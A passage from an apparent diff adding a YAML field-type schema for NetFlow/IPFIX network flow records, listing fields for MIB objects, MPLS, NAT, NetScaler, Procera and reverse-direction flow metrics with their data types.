mib_capture_time_semantics + type: short + + - name: mib_context_engine_id + type: short + + - name: mib_context_name + type: keyword + + - name: mib_index_indicator + type: long + + - name: mib_module_name + type: keyword + + - name: mib_object_description + type: keyword + + - name: mib_object_identifier + type: short + + - name: mib_object_name + type: keyword + + - name: mib_object_syntax + type: keyword + + - name: mib_object_value_bits + type: short + + - name: mib_object_value_counter + type: long + + - name: mib_object_value_gauge + type: long + + - name: mib_object_value_integer + type: integer + + - name: mib_object_value_ip_address + type: ip + + - name: mib_object_value_octet_string + type: short + + - name: mib_object_value_oid + type: short + + - name: mib_object_value_time_ticks + type: long + + - name: mib_object_value_unsigned + type: long + + - name: mib_sub_identifier + type: long + + - name: min_export_seconds + type: date + + - name: min_flow_start_microseconds + type: date + + - name: min_flow_start_milliseconds + type: date + + - name: min_flow_start_nanoseconds + type: date + + - name: min_flow_start_seconds + type: date + + - name: minimum_ip_total_length + type: long + + - name: minimum_layer2_total_length + type: long + + - name: minimum_ttl + type: short + + - name: mobile_imsi + type: keyword + + - name: mobile_msisdn + type: keyword + + - name: monitoring_interval_end_milli_seconds + type: date + + - name: monitoring_interval_start_milli_seconds + type: date + + - name: mpls_label_stack_depth + type: long + + - name: mpls_label_stack_length + type: long + + - name: mpls_label_stack_section + type: short + + - name: mpls_label_stack_section10 + type: short + + - name: mpls_label_stack_section2 + type: short + + - name: mpls_label_stack_section3 + type: short + + - name: mpls_label_stack_section4 + type: short + + - name: mpls_label_stack_section5 + type: short + + - name: mpls_label_stack_section6 + type: short + + - name: mpls_label_stack_section7 + type: short + + - name: mpls_label_stack_section8 + type: short + + - name: mpls_label_stack_section9 + type: short + + - name: mpls_payload_length + type: long + + - name: mpls_payload_packet_section + type: short + + - name: mpls_top_label_exp + type: short + + - name: mpls_top_label_ipv4_address + type: ip + + - name: mpls_top_label_ipv6_address + type: ip + + - name: mpls_top_label_prefix_length + type: short + + - name: mpls_top_label_stack_section + type: short + + - name: mpls_top_label_ttl + type: short + + - name: mpls_top_label_type + type: short + + - name: mpls_vpn_route_distinguisher + type: short + + - name: mptcp_address_id + type: short + + - name: mptcp_flags + type: short + + - name: mptcp_initial_data_sequence_number + type: long + + - name: mptcp_maximum_segment_size + type: integer + + - name: mptcp_receiver_token + type: long + + - name: multicast_replication_factor + type: long + + - name: nat_event + type: short + + - name: nat_inside_svcid + type: integer + + - name: nat_instance_id + type: long + + - name: nat_originating_address_realm + type: short + + - name: nat_outside_svcid + type: integer + + - name: nat_pool_id + type: long + + - name: nat_pool_name + type: keyword + + - name: nat_quota_exceeded_event + type: long + + - name: nat_sub_string + type: keyword + + - name: nat_threshold_event + type: long + + - name: nat_type + type: short + + - name: netscale_ica_client_version + type: keyword + + - name: netscaler_aaa_username + type: keyword + + - name: netscaler_app_name + type: keyword + + - name: netscaler_app_name_app_id + type: long + + - name: netscaler_app_name_incarnation_number + type: long + + - name: netscaler_app_template_name + type: keyword + + - name: netscaler_app_unit_name_app_id + type: long + + - name: netscaler_application_startup_duration + type: long + + - name: netscaler_application_startup_time + type: long + + - name: netscaler_cache_redir_client_connection_core_id + type: long + + - name: netscaler_cache_redir_client_connection_transaction_id + type: long + + - name: netscaler_client_rtt + type: long + + - name: netscaler_connection_chain_hop_count + type: long + + - name: netscaler_connection_chain_id + type: short + + - name: netscaler_connection_id + type: long + + - name: netscaler_current_license_consumed + type: long + + - name: netscaler_db_clt_host_name + type: keyword + + - name: netscaler_db_database_name + type: keyword + + - name: netscaler_db_login_flags + type: long + + - name: netscaler_db_protocol_name + type: short + + - name: netscaler_db_req_string + type: keyword + + - name: netscaler_db_req_type + type: short + + - name: netscaler_db_resp_length + type: long + + - name: netscaler_db_resp_status + type: long + + - name: netscaler_db_resp_status_string + type: keyword + + - name: netscaler_db_user_name + type: keyword + + - name: netscaler_flow_flags + type: long + + - name: netscaler_http_client_interaction_end_time + type: keyword + + - name: netscaler_http_client_interaction_start_time + type: keyword + + - name: netscaler_http_client_render_end_time + type: keyword + + - name: netscaler_http_client_render_start_time + type: keyword + + - name: netscaler_http_content_type + type: keyword + + - name: netscaler_http_domain_name + type: keyword + + - name: netscaler_http_req_authorization + type: keyword + + - name: netscaler_http_req_cookie + type: keyword + + - name: netscaler_http_req_forw_fb + type: long + + - name: netscaler_http_req_forw_lb + type: long + + - name: netscaler_http_req_host + type: keyword + + - name: netscaler_http_req_method + type: keyword + + - name: netscaler_http_req_rcv_fb + type: long + + - name: netscaler_http_req_rcv_lb + type: long + + - name: netscaler_http_req_referer + type: keyword + + - name: netscaler_http_req_url + type: keyword + + - name: netscaler_http_req_user_agent + type: keyword + + - name: netscaler_http_req_via + type: keyword + + - name: netscaler_http_req_xforwarded_for + type: keyword + + - name: netscaler_http_res_forw_fb + type: long + + - name: netscaler_http_res_forw_lb + type: long + + - name: netscaler_http_res_location + type: keyword + + - name: netscaler_http_res_rcv_fb + type: long + + - name: netscaler_http_res_rcv_lb + type: long + + - name: netscaler_http_res_set_cookie + type: keyword + + - name: netscaler_http_res_set_cookie2 + type: keyword + + - name: netscaler_http_rsp_len + type: long + + - name: netscaler_http_rsp_status + type: integer + + - name: netscaler_ica_app_module_path + type: keyword + + - name: netscaler_ica_app_process_id + type: long + + - name: netscaler_ica_application_name + type: keyword + + - name: netscaler_ica_application_termination_time + type: long + + - name: netscaler_ica_application_termination_type + type: integer + + - name: netscaler_ica_channel_id1 + type: long + + - name: netscaler_ica_channel_id1_bytes + type: long + + - name: netscaler_ica_channel_id2 + type: long + + - name: netscaler_ica_channel_id2_bytes + type: long + + - name: netscaler_ica_channel_id3 + type: long + + - name: netscaler_ica_channel_id3_bytes + type: long + + - name: netscaler_ica_channel_id4 + type: long + + - name: netscaler_ica_channel_id4_bytes + type: long + + - name: netscaler_ica_channel_id5 + type: long + + - name: netscaler_ica_channel_id5_bytes + type: long + + - name: netscaler_ica_client_host_name + type: keyword + + - name: netscaler_ica_client_ip + type: ip + + - name: netscaler_ica_client_launcher + type: integer + + - name: netscaler_ica_client_side_rto_count + type: integer + + - name: netscaler_ica_client_side_window_size + type: integer + + - name: netscaler_ica_client_type + type: integer + + - name: netscaler_ica_clientside_delay + type: long + + - name: netscaler_ica_clientside_jitter + type: long + + - name: netscaler_ica_clientside_packets_retransmit + type: integer + + - name: netscaler_ica_clientside_rtt + type: long + + - name: netscaler_ica_clientside_rx_bytes + type: long + + - name: netscaler_ica_clientside_srtt + type: long + + - name: netscaler_ica_clientside_tx_bytes + type: long + + - name: netscaler_ica_connection_priority + type: integer + + - name: netscaler_ica_device_serial_no + type: long + + - name: netscaler_ica_domain_name + type: keyword + + - name: netscaler_ica_flags + type: long + + - name: netscaler_ica_host_delay + type: long + + - name: netscaler_ica_l7_client_latency + type: long + + - name: netscaler_ica_l7_server_latency + type: long + + - name: netscaler_ica_launch_mechanism + type: integer + + - name: netscaler_ica_network_update_end_time + type: long + + - name: netscaler_ica_network_update_start_time + type: long + + - name: netscaler_ica_rtt + type: long + + - name: netscaler_ica_server_name + type: keyword + + - name: netscaler_ica_server_side_rto_count + type: integer + + - name: netscaler_ica_server_side_window_size + type: integer + + - name: netscaler_ica_serverside_delay + type: long + + - name: netscaler_ica_serverside_jitter + type: long + + - name: netscaler_ica_serverside_packets_retransmit + type: integer + + - name: netscaler_ica_serverside_rtt + type: long + + - name: netscaler_ica_serverside_srtt + type: long + + - name: netscaler_ica_session_end_time + type: long + + - name: netscaler_ica_session_guid + type: short + + - name: netscaler_ica_session_reconnects + type: short + + - name: netscaler_ica_session_setup_time + type: long + + - name: netscaler_ica_session_update_begin_sec + type: long + + - name: netscaler_ica_session_update_end_sec + type: long + + - name: netscaler_ica_username + type: keyword + + - name: netscaler_license_type + type: short + + - name: netscaler_main_page_core_id + type: long + + - name: netscaler_main_page_id + type: long + + - name: netscaler_max_license_count + type: long + + - name: netscaler_msi_client_cookie + type: short + + - name: netscaler_round_trip_time + type: long + + - name: netscaler_server_ttfb + type: long + + - name: netscaler_server_ttlb + type: long + + - name: netscaler_syslog_message + type: keyword + + - name: netscaler_syslog_priority + type: short + + - name: netscaler_syslog_timestamp + type: long + + - name: netscaler_transaction_id + type: long + + - name: netscaler_unknown270 + type: long + + - name: netscaler_unknown271 + type: long + + - name: netscaler_unknown272 + type: long + + - name: netscaler_unknown273 + type: long + + - name: netscaler_unknown274 + type: long + + - name: netscaler_unknown275 + type: long + + - name: netscaler_unknown276 + type: long + + - name: netscaler_unknown277 + type: long + + - name: netscaler_unknown278 + type: long + + - name: netscaler_unknown279 + type: long + + - name: netscaler_unknown280 + type: long + + - name: netscaler_unknown281 + type: long + + - name: netscaler_unknown282 + type: long + + - name: netscaler_unknown283 + type: long + + - name: netscaler_unknown284 + type: long + + - name: netscaler_unknown285 + type: long + + - name: netscaler_unknown286 + type: long + + - name: netscaler_unknown287 + type: long + + - name: netscaler_unknown288 + type: long + + - name: netscaler_unknown289 + type: long + + - name: netscaler_unknown290 + type: long + + - name: netscaler_unknown291 + type: long + + - name: netscaler_unknown292 + type: long + + - name: netscaler_unknown293 + type: long + + - name: netscaler_unknown294 + type: long + + - name: netscaler_unknown295 + type: long + + - name: netscaler_unknown296 + type: long + + - name: netscaler_unknown297 + type: long + + - name: netscaler_unknown298 + type: long + + - name: netscaler_unknown299 + type: long + + - name: netscaler_unknown300 + type: long + + - name: netscaler_unknown301 + type: long + + - name: netscaler_unknown302 + type: long + + - name: netscaler_unknown303 + type: long + + - name: netscaler_unknown304 + type: long + + - name: netscaler_unknown305 + type: long + + - name: netscaler_unknown306 + type: long + + - name: netscaler_unknown307 + type: long + + - name: netscaler_unknown308 + type: long + + - name: netscaler_unknown309 + type: long + + - name: netscaler_unknown310 + type: long + + - name: netscaler_unknown311 + type: long + + - name: netscaler_unknown312 + type: long + + - name: netscaler_unknown313 + type: long + + - name: netscaler_unknown314 + type: long + + - name: netscaler_unknown315 + type: long + + - name: netscaler_unknown316 + type: keyword + + - name: netscaler_unknown317 + type: long + + - name: netscaler_unknown318 + type: long + + - name: netscaler_unknown319 + type: keyword + + - name: netscaler_unknown320 + type: integer + + - name: netscaler_unknown321 + type: long + + - name: netscaler_unknown322 + type: long + + - name: netscaler_unknown323 + type: integer + + - name: netscaler_unknown324 + type: integer + + - name: netscaler_unknown325 + type: integer + + - name: netscaler_unknown326 + type: integer + + - name: netscaler_unknown327 + type: long + + - name: netscaler_unknown328 + type: integer + + - name: netscaler_unknown329 + type: integer + + - name: netscaler_unknown330 + type: integer + + - name: netscaler_unknown331 + type: integer + + - name: netscaler_unknown332 + type: long + + - name: netscaler_unknown333 + type: keyword + + - name: netscaler_unknown334 + type: keyword + + - name: netscaler_unknown335 + type: long + + - name: netscaler_unknown336 + type: long + + - name: netscaler_unknown337 + type: long + + - name: netscaler_unknown338 + type: long + + - name: netscaler_unknown339 + type: long + + - name: netscaler_unknown340 + type: long + + - name: netscaler_unknown341 + type: long + + - name: netscaler_unknown342 + type: long + + - name: netscaler_unknown343 + type: long + + - name: netscaler_unknown344 + type: long + + - name: netscaler_unknown345 + type: long + + - name: netscaler_unknown346 + type: long + + - name: netscaler_unknown347 + type: long + + - name: netscaler_unknown348 + type: integer + + - name: netscaler_unknown349 + type: keyword + + - name: netscaler_unknown350 + type: keyword + + - name: netscaler_unknown351 + type: keyword + + - name: netscaler_unknown352 + type: integer + + - name: netscaler_unknown353 + type: long + + - name: netscaler_unknown354 + type: long + + - name: netscaler_unknown355 + type: long + + - name: netscaler_unknown356 + type: long + + - name: netscaler_unknown357 + type: long + + - name: netscaler_unknown363 + type: short + + - name: netscaler_unknown383 + type: short + + - name: netscaler_unknown391 + type: long + + - name: netscaler_unknown398 + type: long + + - name: netscaler_unknown404 + type: long + + - name: netscaler_unknown405 + type: long + + - name: netscaler_unknown427 + type: long + + - name: netscaler_unknown429 + type: short + + - name: netscaler_unknown432 + type: short + + - name: netscaler_unknown433 + type: short + + - name: netscaler_unknown453 + type: long + + - name: netscaler_unknown465 + type: long + + - name: new_connection_delta_count + type: long + + - name: next_header_ipv6 + type: short + + - name: non_empty_packet_count + type: long + + - name: not_sent_flow_total_count + type: long + + - name: not_sent_layer2_octet_total_count + type: long + + - name: not_sent_octet_total_count + type: long + + - name: not_sent_packet_total_count + type: long + + - name: observation_domain_id + type: long + + - name: observation_domain_name + type: keyword + + - name: observation_point_id + type: long + + - name: observation_point_type + type: short + + - name: observation_time_microseconds + type: date + + - name: observation_time_milliseconds + type: date + + - name: observation_time_nanoseconds + type: date + + - name: observation_time_seconds + type: date + + - name: observed_flow_total_count + type: long + + - name: octet_delta_count + type: long + + - name: octet_delta_sum_of_squares + type: long + + - name: octet_total_count + type: long + + - name: octet_total_sum_of_squares + type: long + + - name: opaque_octets + type: short + + - name: original_exporter_ipv4_address + type: ip + + - name: original_exporter_ipv6_address + type: ip + + - name: original_flows_completed + type: long + + - name: original_flows_initiated + type: long + + - name: original_flows_present + type: long + + - name: original_observation_domain_id + type: long + + - name: os_finger_print + type: keyword + + - name: os_name + type: keyword + + - name: os_version + type: keyword + + - name: p2p_technology + type: keyword + + - name: packet_delta_count + type: long + + - name: packet_total_count + type: long + + - name: padding_octets + type: short + + - name: payload + type: keyword + + - name: payload_entropy + type: short + + - name: payload_length_ipv6 + type: integer + + - name: policy_qos_classification_hierarchy + type: long + + - name: policy_qos_queue_index + type: long + + - name: policy_qos_queuedrops + type: long + + - name: policy_qos_queueindex + type: long + + - name: port_id + type: long + + - name: port_range_end + type: integer + + - name: port_range_num_ports + type: integer + + - name: port_range_start + type: integer + + - name: port_range_step_size + type: integer + + - name: post_destination_mac_address + type: keyword + + - name: post_dot1q_customer_vlan_id + type: integer + + - name: post_dot1q_vlan_id + type: integer + + - name: post_ip_class_of_service + type: short + + - name: post_ip_diff_serv_code_point + type: short + + - name: post_ip_precedence + type: short + + - name: post_layer2_octet_delta_count + type: long + + - name: post_layer2_octet_total_count + type: long + + - name: post_mcast_layer2_octet_delta_count + type: long + + - name: post_mcast_layer2_octet_total_count + type: long + + - name: post_mcast_octet_delta_count + type: long + + - name: post_mcast_octet_total_count + type: long + + - name: post_mcast_packet_delta_count + type: long + + - name: post_mcast_packet_total_count + type: long + + - name: post_mpls_top_label_exp + type: short + + - name: post_napt_destination_transport_port + type: integer + + - name: post_napt_source_transport_port + type: integer + + - name: post_nat_destination_ipv4_address + type: ip + + - name: post_nat_destination_ipv6_address + type: ip + + - name: post_nat_source_ipv4_address + type: ip + + - name: post_nat_source_ipv6_address + type: ip + + - name: post_octet_delta_count + type: long + + - name: post_octet_total_count + type: long + + - name: post_packet_delta_count + type: long + + - name: post_packet_total_count + type: long + + - name: post_source_mac_address + type: keyword + + - name: post_vlan_id + type: integer + + - name: private_enterprise_number + type: long + + - name: procera_apn + type: keyword + + - name: procera_base_service + type: keyword + + - name: procera_content_categories + type: keyword + + - name: procera_device_id + type: long + + - name: procera_external_rtt + type: integer + + - name: procera_flow_behavior + type: keyword + + - name: procera_ggsn + type: keyword + + - name: procera_http_content_type + type: keyword + + - name: procera_http_file_length + type: long + + - name: procera_http_language + type: keyword + + - name: procera_http_location + type: keyword + + - name: procera_http_referer + type: keyword + + - name: procera_http_request_method + type: keyword + + - name: procera_http_request_version + type: keyword + + - name: procera_http_response_status + type: integer + + - name: procera_http_url + type: keyword + + - name: procera_http_user_agent + type: keyword + + - name: procera_imsi + type: long + + - name: procera_incoming_octets + type: long + + - name: procera_incoming_packets + type: long + + - name: procera_incoming_shaping_drops + type: long + + - name: procera_incoming_shaping_latency + type: integer + + - name: procera_internal_rtt + type: integer + + - name: procera_local_ipv4_host + type: ip + + - name: procera_local_ipv6_host + type: ip + + - name: procera_msisdn + type: long + + - name: procera_outgoing_octets + type: long + + - name: procera_outgoing_packets + type: long + + - name: procera_outgoing_shaping_drops + type: long + + - name: procera_outgoing_shaping_latency + type: integer + + - name: procera_property + type: keyword + + - name: procera_qoe_incoming_external + type: float + + - name: procera_qoe_incoming_internal + type: float + + - name: procera_qoe_outgoing_external + type: float + + - name: procera_qoe_outgoing_internal + type: float + + - name: procera_rat + type: keyword + + - name: procera_remote_ipv4_host + type: ip + + - name: procera_remote_ipv6_host + type: ip + + - name: procera_rnc + type: integer + + - name: procera_server_hostname + type: keyword + + - name: procera_service + type: keyword + + - name: procera_sgsn + type: keyword + + - name: procera_subscriber_identifier + type: keyword + + - name: procera_template_name + type: keyword + + - name: procera_user_location_information + type: keyword + + - name: protocol_identifier + type: short + + - name: pseudo_wire_control_word + type: long + + - name: pseudo_wire_destination_ipv4_address + type: ip + + - name: pseudo_wire_id + type: long + + - name: pseudo_wire_type + type: integer + + - name: reason + type: long + + - name: reason_text + type: keyword + + - name: relative_error + type: double + + - name: responder_octets + type: long + + - name: responder_packets + type: long + + - name: reverse_absolute_error + type: double + + - name: reverse_anonymization_flags + type: integer + + - name: reverse_anonymization_technique + type: integer + + - name: reverse_application_category_name + type: keyword + + - name: reverse_application_description + type: keyword + + - name: reverse_application_group_name + type: keyword + + - name: reverse_application_id + type: keyword + + - name: reverse_application_name + type: keyword + + - name: reverse_application_sub_category_name + type: keyword + + - name: reverse_average_interarrival_time + type: long + + - name: reverse_bgp_destination_as_number + type: long + + - name: reverse_bgp_next_adjacent_as_number + type: long + + - name: reverse_bgp_next_hop_ipv4_address + type: ip + + - name: reverse_bgp_next_hop_ipv6_address + type: ip + + - name: reverse_bgp_prev_adjacent_as_number + type: long + + - name: reverse_bgp_source_as_number + type: long + + - name: reverse_bgp_validity_state + type: short + + - name: reverse_class_id + type: short + + - name: reverse_class_name + type: keyword + + - name: reverse_classification_engine_id + type: short + + - name: reverse_collection_time_milliseconds + type: long + + - name: reverse_collector_certificate + type: keyword + + - name: reverse_confidence_level + type: double + + - name: reverse_connection_sum_duration_seconds + type: long + + - name: reverse_connection_transaction_id + type: long + + - name: reverse_data_byte_count + type: long + + - name: reverse_data_link_frame_section + type: keyword + + - name: reverse_data_link_frame_size + type: integer + + - name: reverse_data_link_frame_type + type: integer + + - name: reverse_data_records_reliability + type: short + + - name: reverse_delta_flow_count + type: long + + - name: reverse_destination_ipv4_address + type: ip + + - name: reverse_destination_ipv4_prefix + type: ip + + - name: reverse_destination_ipv4_prefix_length + type: short + + - name: reverse_destination_ipv6_address + type: ip + + - name: reverse_destination_ipv6_prefix + type: ip + + - name: reverse_destination_ipv6_prefix_length + type: short + + - name: reverse_destination_mac_address + type: keyword + + - name: reverse_destination_transport_port + type: integer + + - name: reverse_digest_hash_value + type: long + + - name: reverse_distinct_count_of_destination_ip_address + type: long + + - name: reverse_distinct_count_of_destination_ipv4_address + type: long + + - name: reverse_distinct_count_of_destination_ipv6_address + type: long + + - name: reverse_distinct_count_of_source_ip_address + type: long + + - name: reverse_distinct_count_of_source_ipv4_address + type: long + + - name: reverse_distinct_count_of_source_ipv6_address + type: long + + - name: reverse_dot1q_customer_dei + type: short + + - name: reverse_dot1q_customer_destination_mac_address + type: keyword + + - name: reverse_dot1q_customer_priority + type: short + + - name: reverse_dot1q_customer_source_mac_address + type: keyword + + - name: reverse_dot1q_customer_vlan_id + type: integer + + - name: reverse_dot1q_dei + type: short + + - name: reverse_dot1q_priority + type: short + + - name: reverse_dot1q_service_instance_id + type: long + + - name: reverse_dot1q_service_instance_priority + type: short + + - name: reverse_dot1q_service_instance_tag + type: keyword + + - name: reverse_dot1q_vlan_id + type: integer + + - name: reverse_dropped_layer2_octet_delta_count + type: long + + - name: reverse_dropped_layer2_octet_total_count + type: long + + - name: reverse_dropped_octet_delta_count + type: long + + - name: reverse_dropped_octet_total_count + type: long + + - name: reverse_dropped_packet_delta_count + type: long + + - name: reverse_dropped_packet_total_count + type: long + + - name: reverse_dst_traffic_index + type: long + + - name: reverse_egress_broadcast_packet_total_count + type: long + + - name: reverse_egress_interface + type: long + + - name: reverse_egress_interface_type + type: long + + - name: reverse_egress_physical_interface + type: long + + - name: reverse_egress_unicast_packet_total_count + type: long + + - name: reverse_egress_vrfid + type: long + + - name: reverse_encrypted_technology + type: keyword + + - name: reverse_engine_id + type: short + + - name: reverse_engine_type + type: short + + - name: reverse_ethernet_header_length + type: short + + - name: reverse_ethernet_payload_length + type: integer + + - name: reverse_ethernet_total_length + type: integer + + - name: reverse_ethernet_type + type: integer + + - name: reverse_export_sctp_stream_id + type: integer + + - name: reverse_exporter_certificate + type: keyword + + - name: reverse_exporting_process_id + type: long + + - name: reverse_firewall_event + type: short + + - name: reverse_first_non_empty_packet_size + type: integer + + - name: reverse_first_packet_banner + type: keyword + + - name: reverse_flags_and_sampler_id + type: long + + - name: reverse_flow_active_timeout + type: integer + + - name: reverse_flow_attributes + type: integer + + - name: reverse_flow_delta_milliseconds + type: long + + - name: reverse_flow_direction + type: short + + - name: reverse_flow_duration_microseconds + type: long + + - name: reverse_flow_duration_milliseconds + type: long + + - name: reverse_flow_end_delta_microseconds + type: long + + - name: reverse_flow_end_microseconds + type: long + + - name: reverse_flow_end_milliseconds + type: long + + - name: reverse_flow_end_nanoseconds + type: long + + - name: reverse_flow_end_reason + type: short + + - name: reverse_flow_end_seconds + type: long + + - name: reverse_flow_end_sys_up_time + type: long + + - name: reverse_flow_idle_timeout + type: integer + + - name: reverse_flow_label_ipv6 + type: long + + - name: reverse_flow_sampling_time_interval + type: long + + - name: reverse_flow_sampling_time_spacing + type: long + + - name: reverse_flow_selected_flow_delta_count + type: long + + - name: reverse_flow_selected_octet_delta_count + type: long + + - name: reverse_flow_selected_packet_delta_count + type: long + + - name: reverse_flow_selector_algorithm + type: integer + + - name: reverse_flow_start_delta_microseconds + type: long + + - name: reverse_flow_start_microseconds + type: long + + - name: reverse_flow_start_milliseconds + type: long + + - name: reverse_flow_start_nanoseconds + type: long + + - name: reverse_flow_start_seconds + type: long + + - name: reverse_flow_start_sys_up_time + type: long + + - name: reverse_forwarding_status + type: long + + - name: reverse_fragment_flags + type: short + + - name: reverse_fragment_identification + type: long + + - name: reverse_fragment_offset + type: integer + + - name: reverse_gre_key + type: long + + - name: reverse_hash_digest_output + type: short + + - name: reverse_hash_flow_domain + type: integer + + - name: reverse_hash_initialiser_value + type: long + + - name: reverse_hash_ip_payload_offset + type: long + + - name: reverse_hash_ip_payload_size + type: long + + - name: reverse_hash_output_range_max + type: long + + - name: reverse_hash_output_range_min + type: long + + - name: reverse_hash_selected_range_max + type: long + + - name: reverse_hash_selected_range_min + type: long + + - name: reverse_icmp_code_ipv4 + type: short + + - name: reverse_icmp_code_ipv6 + type: short + + - name: reverse_icmp_type_code_ipv4 + type: integer + + - name: reverse_icmp_type_code_ipv6 + type: integer + + - name: reverse_icmp_type_ipv4 + type: short + + - name: reverse_icmp_type_ipv6 + type: short + + - name: reverse_igmp_type + type: short + + - name: reverse_ignored_data_record_total_count + type: long + + - name: reverse_ignored_layer2_frame_total_count + type: long + + - name: reverse_ignored_layer2_octet_total_count + type: long + + - name: reverse_information_element_data_type + type: short + + - name: reverse_information_element_description + type: keyword + + - name: reverse_information_element_id + type: integer + + - name: reverse_information_element_index + type: integer + + - name: reverse_information_element_name + type: keyword + + - name: reverse_information_element_range_begin + type: long + + - name: reverse_information_element_range_end + type: long + + - name: reverse_information_element_semantics + type: short + + - name: reverse_information_element_units + type: integer + + - name: reverse_ingress_broadcast_packet_total_count + type: long + + - name: reverse_ingress_interface + type: long + + - name: reverse_ingress_interface_type + type: long + + - name: reverse_ingress_multicast_packet_total_count + type: long + + - name: reverse_ingress_physical_interface + type: long + + - name: reverse_ingress_unicast_packet_total_count + type: long + + - name: reverse_ingress_vrfid + type: long + + - name: reverse_initial_tcp_flags + type: short + + - name: reverse_initiator_octets + type: long + + - name: reverse_initiator_packets + type: long + + - name: reverse_interface_description + type: keyword + + - name: reverse_interface_name + type: keyword + + - name: reverse_intermediate_process_id + type: long + + - name: reverse_ip_class_of_service + type: short + + - name: reverse_ip_diff_serv_code_point + type: short + + - name: reverse_ip_header_length + type: short + + - name: reverse_ip_header_packet_section + type: keyword + + - name: reverse_ip_next_hop_ipv4_address + type: ip + + - name: reverse_ip_next_hop_ipv6_address + type: ip + + - name: reverse_ip_payload_length + type: long + + - name: reverse_ip_payload_packet_section + type: keyword + + - name: reverse_ip_precedence + type: short + + - name: reverse_ip_sec_spi + type: long + + - name: reverse_ip_total_length + type: long + + - name: reverse_ip_ttl + type: short + + - name: reverse_ip_version + type: short + + - name: reverse_ipv4_ihl + type: short + + - name: reverse_ipv4_options + type: long + + - name: reverse_ipv4_router_sc + type: ip + + - name: reverse_ipv6_extension_headers + type: long + + - name: reverse_is_multicast + type: short + + - name: reverse_large_packet_count + type: long + + - name: reverse_layer2_frame_delta_count + type: long + + - name: reverse_layer2_frame_total_count + type: long + + - name: reverse_layer2_octet_delta_count + type: long + + - name: reverse_layer2_octet_delta_sum_of_squares + type: long + + - name: reverse_layer2_octet_total_count + type: long + + - name: reverse_layer2_octet_total_sum_of_squares + type: long + + - name: reverse_layer2_segment_id + type: long + + - name: reverse_layer2packet_section_data + type: keyword + + - name: reverse_layer2packet_section_offset + type: integer + + - name: reverse_layer2packet_section_size + type: integer + + - name: reverse_line_card_id + type: long + + - name: reverse_lower_ci_limit + type: double + + - name: reverse_max_export_seconds + type: long + + - name: reverse_max_flow_end_microseconds + type: long + + - name: reverse_max_flow_end_milliseconds + type: long + + - name: reverse_max_flow_end_nanoseconds + type: long + + - name: reverse_max_flow_end_seconds + type: long + + - name: reverse_max_packet_size + type: integer + + - name: reverse_maximum_ip_total_length + type: long + + - name: reverse_maximum_layer2_total_length + type: long + + - name: reverse_maximum_ttl + type: short + + - name: reverse_message_md5_checksum + type: keyword + + - name: reverse_message_scope + type: short + + - name: reverse_metering_process_id + type: long + + - name: reverse_metro_evc_id + type: keyword + + - name: reverse_metro_evc_type + type: short + + - name: reverse_min_export_seconds + type: long + + - name: reverse_min_flow_start_microseconds + type: long + + - name: reverse_min_flow_start_milliseconds + type: long + + - name: reverse_min_flow_start_nanoseconds + type: long + + - name: reverse_min_flow_start_seconds + type: long + + - name: reverse_minimum_ip_total_length + type: long + + - name: reverse_minimum_layer2_total_length + type: long + + - name: reverse_minimum_ttl + type: short + + - name: reverse_monitoring_interval_end_milli_seconds + type: long + + - name: reverse_monitoring_interval_start_milli_seconds + type: long + + - name: reverse_mpls_label_stack_depth + type: long + + - name: reverse_mpls_label_stack_length + type: long + + - name: reverse_mpls_label_stack_section + type: keyword + + - name: reverse_mpls_label_stack_section10 + type: keyword + + - name: reverse_mpls_label_stack_section2 + type: keyword + + - name: reverse_mpls_label_stack_section3 + type: keyword + + - name: reverse_mpls_label_stack_section4 + type: keyword + + - name: reverse_mpls_label_stack_section5 + type: keyword + + - name: reverse_mpls_label_stack_section6 + type: keyword + + - name: reverse_mpls_label_stack_section7 + type: keyword + + - name: reverse_mpls_label_stack_section8 + type: keyword + + - name: reverse_mpls_label_stack_section9 + type: keyword + + - name: reverse_mpls_payload_length + type: long + + - name: reverse_mpls_payload_packet_section + type: keyword + + - name: reverse_mpls_top_label_exp + type: short + + - name: reverse_mpls_top_label_ipv4_address + type: ip + + - name: reverse_mpls_top_label_ipv6_address + type: ip + + - name: reverse_mpls_top_label_prefix_length + type: short + + - name: reverse_mpls_top_label_stack_section + type: keyword + + - name: reverse_mpls_top_label_ttl + type: short + + - name: reverse_mpls_top_label_type + type: short + + - name: reverse_mpls_vpn_route_distinguisher + type: keyword + + - name: reverse_multicast_replication_factor + type: long + + - name: reverse_nat_event + type: short + + - name: reverse_nat_originating_address_realm + type: short + + - name: reverse_nat_pool_id + type: long + + - name: reverse_nat_pool_name + type: keyword + + - name: reverse_nat_type + type: short + + - name: reverse_new_connection_delta_count + type: long + + - name: reverse_next_header_ipv6 + type: short + + - name: reverse_non_empty_packet_count + type: long + + - name: reverse_not_sent_layer2_octet_total_count + type: long + + - name: reverse_observation_domain_name + type: keyword + + - name: reverse_observation_point_id + type: long + + - name: reverse_observation_point_type + type: short + + - name: reverse_observation_time_microseconds + type: long + + - name: reverse_observation_time_milliseconds + type: long + + - name: reverse_observation_time_nanoseconds + type: long + + - name: reverse_observation_time_seconds + type: long + + - name: reverse_octet_delta_count + type: long + + - name: reverse_octet_delta_sum_of_squares + type: long + + - name: reverse_octet_total_count + type: long + + - name: reverse_octet_total_sum_of_squares + type: long + + - name: reverse_opaque_octets + type: keyword + + - name: reverse_original_exporter_ipv4_address + type: ip + + - name: reverse_original_exporter_ipv6_address + type: ip + + - name: reverse_original_flows_completed + type: long + + - name: reverse_original_flows_initiated + type: long + + - name: reverse_original_flows_present + type: long + + - name: reverse_original_observation_domain_id + type: long + + - name: reverse_os_finger_print + type: keyword + + - name: reverse_os_name + type: keyword + + - name: reverse_os_version + type: keyword + + - name: reverse_p2p_technology + type: keyword + + - name: reverse_packet_delta_count + type: long + + - name: reverse_packet_total_count + type: long + + - name: reverse_payload + type: keyword + + - name: reverse_payload_entropy + type: short + + - name: reverse_payload_length_ipv6 + type: integer + + - name: reverse_port_id + type: long + + - name: reverse_port_range_end + type: integer + + - name: reverse_port_range_num_ports + type: integer + + - name: reverse_port_range_start + type: integer + + - name: reverse_port_range_step_size + type: integer + + - name: reverse_post_destination_mac_address + type: keyword + + - name: reverse_post_dot1q_customer_vlan_id + type: integer + + - name: reverse_post_dot1q_vlan_id + type: integer + + - name: reverse_post_ip_class_of_service + type: short + + - name: reverse_post_ip_diff_serv_code_point + type: short + + - name: reverse_post_ip_precedence + type: short + + - name: reverse_post_layer2_octet_delta_count + type: long + + - name: reverse_post_layer2_octet_total_count + type: long + + - name: reverse_post_mcast_layer2_octet_delta_count + type: long + + - name: reverse_post_mcast_layer2_octet_total_count + type: long + + - name: reverse_post_mcast_octet_delta_count + type: long + + - name: reverse_post_mcast_octet_total_count + type: long + + - 